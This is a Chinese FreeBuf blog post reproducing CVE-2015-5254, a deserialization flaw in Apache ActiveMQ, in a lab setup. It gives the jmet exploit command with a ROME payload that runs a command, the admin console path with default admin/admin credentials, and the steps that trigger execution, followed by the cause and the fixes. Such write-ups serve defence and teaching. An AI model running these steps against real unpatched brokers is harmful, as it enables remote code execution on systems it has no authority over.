freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2015-5254:ActiveMQ反序列化
LemonUCKJ 2022-11-25 17:39:49 195589
所属地 北京

环境展示:

1669366522_638082fab8f6efb79dcfe.png!small?1669366521887

工具下载地址:https://download.csdn.net/download/HMX404/87156298

复现过程:

1.执行命令 ,此时会给ActiveMQ添加一个事件队列:

java -jar jmet-0.1.0.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.66.143 61616

执行创建文件命令

1669367350_638086368082e4555c77c.png!small?1669367349543

2.访问:http://192.168.66.143:8161/admin/browse.jsp?JMSDestination=event

用户名:admin 密码:admin

发现生成队列

1669367417_63808679c46a4020ce60b.png!small?1669367416970

3.点击队列对应的编号,执行命令:

1669368019_638088d3b93a5afcadd88.png!small?1669368018809


生成文件成功,证明可以执行命令

1669368932_63808c647298aeb42800d.png!small?1669368931367

漏洞原理:

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

解决方法:

1.打补丁,http://activemq.apache.org/security-advisories.data/CVE-2015-5254-announcement.txt;

2.升级到最新版本;

3.有WAF的可以配置相关规则进行拦截;

更多资讯请访问个人博客     www.zuoci.com

# 漏洞 # 渗透测试 # 网络安全 # web安全 # 漏洞分析
本文为 LemonUCKJ 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
漏洞复现
LemonUCKJ LV.3
这小伙不懒了,不想填写个人描述!
  • 4 文章数
  • 2 关注者
【春秋云境】CVE-2023-33440 Faculty Evaluation System v1.0 存在未授权任意文件上传漏洞漏洞
2024-04-01
SQL注入点判断及注入方式
2022-03-14
网站只有一个登录框怎么办?———用户名密码重置的6种绕过情况
2022-03-14
文章目录